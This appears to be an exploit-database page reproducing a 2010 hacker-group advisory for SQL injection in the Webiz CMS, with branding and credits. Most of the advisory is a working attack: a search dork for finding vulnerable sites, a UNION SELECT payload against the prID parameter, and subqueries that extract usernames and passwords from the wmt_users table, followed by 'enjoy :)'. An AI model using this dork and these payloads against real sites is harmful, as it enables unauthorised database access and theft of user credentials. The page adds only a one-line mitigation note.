header-logo
Suggest Exploit
vendor:
by:
THE PIRATOR (AYMEN AHMADI), kannibal615 (WALID TGS)
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name:
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

WEBIZ SQL INJECTION VULNERABILITY

The vulnerability allows an attacker to perform SQL injection attacks on the webiz.gr website.

Mitigation:

Implement proper input validation and parameterized queries to prevent SQL injection attacks.
Source

Exploit-DB raw data:

@@@@@@  @@   @@  @@@@@    @@@@@    @@   @@@@        @@    @@@@@@  @@@   @@@@
     @@        @@   @@  @@            @@    @@  @@   @@    @   @@  @@    @@       @     @  @@    @
     @@        @@@@@  @@ @@      @@@@@   @@    @@ @@   @@@@@   @@       @      @ @@ @@
     @@        @@   @@  @@            @@             ''     @@     @  @@  @@    @@       @     @  @@    @
     @@        @@   @@  @@@@@    @@           @@   @@      @ @@  @@    @@        @@@   @@     @
      
                                                        VXA@HOTMAIL.FR
                                                             zn@live.de
                                                            VBHACKER.NET
                    
            
     ===========================================================================


                                         WEBIZ SQL INJECTION VULNERABILITY


    ===========================================================================
             
             
             
    ============================================================================
                                                        ABOUT ME
    ============================================================================
    ==   Found By   : THE PIRATOR ---> AYMEN AHMADI
    ==                  : kannibal615 ---> WALID TGS
    ==   website     : www.vbhacker.net/vb
    ==
    ==   email        : vxa [at] hotmail [dot] fr
    ==                  : zn  [at] live    [dot] de
    ==
    ==
    ==   Thanks to  : Pc-InSeCt / emptyzero
    ==                  : DAK / l3G3NDS / m0j4h3d
    ==                  : V!Ru$_T4ckJ3n / __MiM0__ 
    ==                  : / PrideArabs / DIESEL
    ==                  : ALL VBHACKER MEMBERS
    ==
    ============================================================================
                                                     INFORMATIONS
    ============================================================================
    ==   Developers : www.webiz.gr
    ==   vulner     : SQL INJECTION
    ==   Bug        : ../wmt/webpages/index.php
    ==   Variable1  : &prID=
    ==   Variable2  : &apprec=
    ==
    ==   dork       : Powered by Webiz inurl:'wmt/webpages'
    ==
    ============================================================================

    
    ============================================================================
                                                           EXPLOIT
    ============================================================================
    ==
    ==  Dork     : Powered by Webiz inurl:'wmt/webpages'
    == 
    ==  URL      : ../wmt/webpages/index.php?lid=&pid=&prID=[Injection Here]
    ==
    ==  Demo    : http://localhost/wmt/webpages/index.php?lid=&pid=&prID=999.9'
    ==
    ==  exploit  : index.php?lid=&pid=&prID=-999.9/**/UNION/**/ALL/**/SELECT/**/1,2,3...,20--
    ==
    ==  database : MySQL 5
    ==
    ++
    ==
    ==  *** Insert This Code in THE VALID COLUMN ***
    ++               +
    ==  *** CHANGE [DATABASE_NAME] ***
    ==
    ==
    ==
    ==
    ==  USERNAME
    ==  
    ==  (SELECT/**/concat(cast(wmt_users.Username/**/as/**/char))/**/FROM/**/[DATABASE_NAME].wmt_users/**/LIMIT/**/0,1)
    ==  
    ==
    ==
    ==  USER PASSWORD
    ==  
    == (SELECT/**/concat(cast(wmt_users.UserPassword/**/as/**/char))/**/FROM/**/[DATABASE_NAME].wmt_users/**/LIMIT/**/0,1)
    ==
    =============================================================================

    enjoy  :)
    

        ==  Exploit-db.com
        ==  VBHACKER.NET/VB
        ==  kannibal615  Copyright (c) 2010

Navigation

Suggest Exploit

Services By CQR